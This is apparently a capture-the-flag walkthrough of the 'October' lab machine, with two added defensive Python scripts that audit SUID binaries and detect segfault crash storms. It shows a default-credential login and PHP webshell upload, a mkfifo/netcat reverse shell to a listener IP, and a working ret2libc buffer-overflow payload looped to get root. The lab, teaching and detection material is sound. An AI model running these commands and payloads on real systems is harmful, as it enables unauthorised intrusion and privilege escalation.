Getting Root:
The box is running October CMS and we can log in using admin:admin. Navigating to /backend/cms/media allows us to upload PHP files, which gives us a reverse shell. Enumerating the box reveals an interesting executable with the SUID bit set that is vulnerable to a buffer overflow.
Tools Used:
nmap, dirsearch.py, nc, gdb (with the peda extension)
Nmap
# nmap -sC -sV -p- -oA nmap/October 10.10.10.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 23:54 EDT
Nmap scan report for 10.10.10.16
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.61 seconds
Enumeration
Dirsearch.py
sudo /opt/dirsearch/dirsearch.py -u http://10.10.10.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -E
[sudo] password for kali:
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 220521
Error Log: /opt/dirsearch/logs/errors-20-04-01_23-58-08.log
Target: http://10.10.10.16
[23:58:08] Starting:
[23:58:10] 200 - 5KB - /
[23:58:21] 200 - 4KB - /blog
[23:58:32] 301 - 310B - /themes -> http://10.10.10.16/themes/
[23:58:33] 200 - 9KB - /forum
[23:58:37] 301 - 311B - /modules -> http://10.10.10.16/modules/
[23:59:52] 200 - 5KB - /account
[00:00:08] 301 - 309B - /tests -> http://10.10.10.16/tests/
[00:00:10] 301 - 311B - /storage -> http://10.10.10.16/storage/
[00:00:18] 301 - 311B - /plugins -> http://10.10.10.16/plugins/
[00:01:30] 302 - 400B - /backend -> http://10.10.10.16/backend/backend/auth
[00:02:42] 200 - 4KB - /Blog
[00:04:38] 301 - 310B - /vendor -> http://10.10.10.16/vendor/
[00:04:40] 301 - 310B - /config -> http://10.10.10.16/config/
[00:08:45] 200 - 9KB - /Forum
[00:10:14] 200 - 3KB - /error
Navigating to /backend redirects us to http://10.10.10.16/backend/backend/auth.
We can log in with admin:admin, and the application allows us to upload PHP files. I uploaded a webshell and was able to get a shell.
Clicking on the hyperlink opens the location of the webshell in a new tab.
Now we can get a reverse shell using netcat.
Exploitation
# I tried with the -e but it failed, so I used the workaround
# (replace 10.0.0.1 1234 with your own listener's IP and port; the listener below uses 9001)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# On my Kali box
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.16.
Ncat: Connection from 10.10.10.16:40314.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Privilege Escalation
There is a binary with the SUID bit set: /usr/local/bin/ovrflw
www-data@october:/$ find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
267491 68 -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
262216 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
266648 32 -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
262222 36 -rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
262217 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
267489 88 -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
928759 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
1053687 484 -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
931266 12 -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
395450 328 -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
917774 156 -rwsr-xr-x 1 root root 156708 Oct 14 2016 /usr/bin/sudo
922948 32 -rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp
931257 20 -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
922277 48 -rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd
922274 44 -rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn
921702 68 -rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd
930650 20 -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
930677 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
921701 36 -rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh
930939 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
930733 316 -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
928820 20 -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
664031 8 -rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw
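The find output above is exactly what a defender should be reviewing as well: a setuid-root binary under /usr/local/bin that no package installed is the thing that stands out. The following is an added example (my code, not part of the original writeup) that parses `find -ls` output, compares it against an allowlist of the stock SUID binaries seen on this host, and flags anything outside the package-managed directories. The sample input is a handful of lines copied from the listing above; the allowlist and directory prefixes are my own assumptions for an Ubuntu 14.04-era box.

```python
"""Audit `find / -type f -perm -4000 -ls` output for out-of-place SUID binaries.
Added example for this writeup; not code from the original page."""

# Directories normally populated by the package manager. A setuid-root binary
# anywhere else (/usr/local, /opt, /home, /tmp, ...) deserves a second look.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/lib/")

# Allowlist of SUID binaries expected on this host, built from the stock entries
# in the find listing on this page (assumption: in practice generate it from a
# known-good image or from the package manager's file lists).
DEFAULT_BASELINE = frozenset({
    "/bin/umount", "/bin/ping", "/bin/fusermount", "/bin/su", "/bin/ping6",
    "/bin/mount", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/bin/sudo",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/traceroute6.iputils", "/usr/bin/mtr",
    "/usr/bin/chsh", "/usr/bin/at", "/usr/sbin/pppd", "/usr/sbin/uuidd",
})

# Sample input: a few lines taken from the find output on this page.
SAMPLE_FIND_OUTPUT = """\
267491 68 -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
262222 36 -rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
917774 156 -rwsr-xr-x 1 root root 156708 Oct 14 2016 /usr/bin/sudo
930939 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
930733 316 -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
664031 8 -rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw
"""


def parse_find_ls(output):
    """Yield (mode, owner, group, size, path) for each `find -ls` line.

    `find -ls` prints: inode blocks mode links owner group size month day year|time path.
    Splitting into at most 11 fields keeps paths containing spaces intact."""
    for line in output.splitlines():
        fields = line.split(None, 10)
        if len(fields) != 11:
            continue  # blank or truncated line
        _inode, _blocks, mode, _links, owner, group, size, _mon, _day, _year, path = fields
        yield mode, owner, group, int(size), path


def audit_suid(output, baseline=DEFAULT_BASELINE):
    """Return one finding per SUID file that is not in the baseline or lives
    outside package-managed directories. `high_impact` marks setuid-root files
    that any user may execute, i.e. the worst case if the binary has a bug."""
    findings = []
    for mode, owner, _group, _size, path in parse_find_ls(output):
        reasons = []
        if path not in baseline:
            reasons.append("not in SUID baseline")
        if not path.startswith(PACKAGED_PREFIXES):
            reasons.append("outside package-managed directories")
        if not reasons:
            continue
        # mode looks like -rwsr-xr-x: index 3 is the owner execute/setuid slot,
        # index 9 the "other" execute bit.
        setuid = mode[3] in "sS"
        world_exec = mode[9] == "x"
        findings.append({
            "path": path,
            "reasons": reasons,
            "high_impact": owner == "root" and setuid and world_exec,
        })
    return findings


if __name__ == "__main__":
    for f in audit_suid(SAMPLE_FIND_OUTPUT):
        flag = "HIGH" if f["high_impact"] else "info"
        print("%s %s: %s" % (flag, f["path"], "; ".join(f["reasons"])))
```

Run against a real host with `find / -type f -perm -4000 -ls 2>/dev/null | python3 audit.py` after swapping the sample for `sys.stdin.read()`; the baseline is the part that needs maintaining, since a stock list from one image will not match another distribution release.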
Let's see if we can exploit this binary by overwriting EIP: send a unique pattern and find the offset using gdb with the peda extension.
Creating a unique pattern of 500 bytes using pattern_create 500, we notice EIP gets overwritten with the pattern 'AA8A'.
Finding the offset using pattern_offset AA8A, we can see the offset is 112.
Finding the base address of libc
www-data@october:/usr/local/bin$ ldd /usr/local/bin/ovrflw | grep libc
ldd /usr/local/bin/ovrflw | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7610000)
libc.so.6: b7610000
Finding the offsets of system, exit and the /bin/sh string inside libc
www-data@october:/usr/local/bin$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
www-data@october:/usr/local/bin$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/"
162bac /bin/sh
system: b7650310 (b7610000 + 40310)
exit: b7643260 (b7610000 + 33260)
/bin/sh: b7772bac (b7610000 + 162bac)
Converting them to little endian, we have:
system: \x10\x03\x65\xb7
exit: \x60\x32\x64\xb7
/bin/sh: \xac\x2b\x77\xb7
Therefore we can try to execute the exploit as follows. Because ASLR randomises where libc is mapped on each run, the base reported by ldd is only one of the possible values, so the payload is run in a loop until the guessed addresses match the real mapping:
while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done
Root
www-data@october:/$ while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbf946e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Trace/breakpoint trap (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': free(): invalid pointer: 0x08048380 ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbfb07e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
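The wall of "Segmentation fault (core dumped)" above is also the loudest signal this technique leaves behind: every failed guess is an unhandled signal in a setuid-root process, and the kernel logs each one as a segfault line. As an added example (my code, not from the original writeup), here is a small detector that reads kernel log lines, groups crashes per program, and raises an alert when one program crashes many times in a short window while always faulting at the same instruction pointer, which is the fingerprint of a fixed guessed address being tried against a randomised libc. The log lines are constructed to mimic the kernel's segfault message format; the host name, PIDs and addresses in them are made up.

```python
"""Detect a crash storm against one binary from kernel segfault log lines.
Added example for this writeup; not code from the original page.
The sample log below is constructed, not captured from the box."""
import re
from collections import defaultdict

# Kernel message format: comm[pid]: segfault at ADDR ip IP sp SP error ERR in OBJ[BASE+LEN]
# The " in ..." suffix is absent when the faulting ip is not inside any mapping.
SEGFAULT_RE = re.compile(
    r"\[\s*(?P<uptime>\d+\.\d+)\]\s+"
    r"(?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>[0-9a-f]+)"
    r"(?: in (?P<obj>\S+?)\[(?P<base>[0-9a-f]+)\+(?P<len>[0-9a-f]+)\])?"
)

# Constructed sample: six ovrflw crashes in two seconds with the same ip and a
# different libc base each time, one unrelated php5 crash, and one lone ovrflw
# crash ten minutes later that must not be counted as part of the burst.
SAMPLE_KERNEL_LOG = """\
Apr  1 23:59:50 october kernel: [ 5120.10] ovrflw[4412]: segfault at b7650310 ip b7650310 sp bfa3c1b0 error 14
Apr  1 23:59:50 october kernel: [ 5120.11] ovrflw[4413]: segfault at 0 ip b7650310 sp bf8a01b0 error 4 in libc-2.19.so[b75e2000+1a5000]
Apr  1 23:59:50 october kernel: [ 5120.12] ovrflw[4414]: segfault at b7650310 ip b7650310 sp bfd0c1b0 error 14
Apr  1 23:59:51 october kernel: [ 5121.03] ovrflw[4415]: segfault at 1f ip b7650310 sp bfb1f1b0 error 4 in libc-2.19.so[b7601000+1a5000]
Apr  1 23:59:51 october kernel: [ 5121.04] ovrflw[4416]: segfault at b7650310 ip b7650310 sp bf9e11b0 error 14
Apr  1 23:59:51 october kernel: [ 5121.05] ovrflw[4417]: segfault at 8 ip b7650310 sp bfc4a1b0 error 4 in libc-2.19.so[b7577000+1a5000]
Apr  1 23:59:55 october kernel: [ 5125.00] php5[2201]: segfault at 0 ip 0806f1c2 sp bfe2a0c0 error 4 in php5[8048000+6d9000]
Apr  2 00:10:00 october kernel: [ 5730.00] ovrflw[5001]: segfault at 41414141 ip 41414141 sp bfa3c1b0 error 14
"""


def parse_segfaults(log):
    """Yield one dict per kernel segfault line; other lines are ignored."""
    for line in log.splitlines():
        m = SEGFAULT_RE.search(line)
        if m:
            ev = m.groupdict()
            ev["uptime"] = float(ev["uptime"])
            yield ev


def detect_crash_storm(log, threshold=5, window_seconds=60.0):
    """Return one alert per program that crashed >= threshold times inside any
    window_seconds span. constant_ip is True when every crash in the burst
    faulted at the same address; libc_bases lists the distinct libc mappings
    observed, which grow with ASLR as the attacker keeps guessing."""
    by_comm = defaultdict(list)
    for ev in parse_segfaults(log):
        by_comm[ev["comm"]].append(ev)

    alerts = []
    for comm, events in by_comm.items():
        events.sort(key=lambda e: e["uptime"])
        best, start = [], 0
        for end in range(len(events)):  # sliding window over crash times
            while events[end]["uptime"] - events[start]["uptime"] > window_seconds:
                start += 1
            if end - start + 1 > len(best):
                best = events[start:end + 1]
        if len(best) >= threshold:
            alerts.append({
                "comm": comm,
                "count": len(best),
                "constant_ip": len({e["ip"] for e in best}) == 1,
                "libc_bases": sorted({e["base"] for e in best if e["base"]}),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_crash_storm(SAMPLE_KERNEL_LOG):
        print("%s crashed %d times; same ip: %s; libc bases seen: %s"
              % (a["comm"], a["count"], a["constant_ip"], ", ".join(a["libc_bases"])))
```

Feed it `journalctl -k` or /var/log/kern.log output instead of the sample; the kernel only prints these lines when it logs unhandled signals (the debug.exception-trace sysctl on x86, on by default on most distributions), so check that first. Core dumps from a setuid binary in /usr/local/bin are another cheap indicator to alert on, and removing the SUID bit from ovrflw or rebuilding it with stack protection and PIE removes the issue at the source.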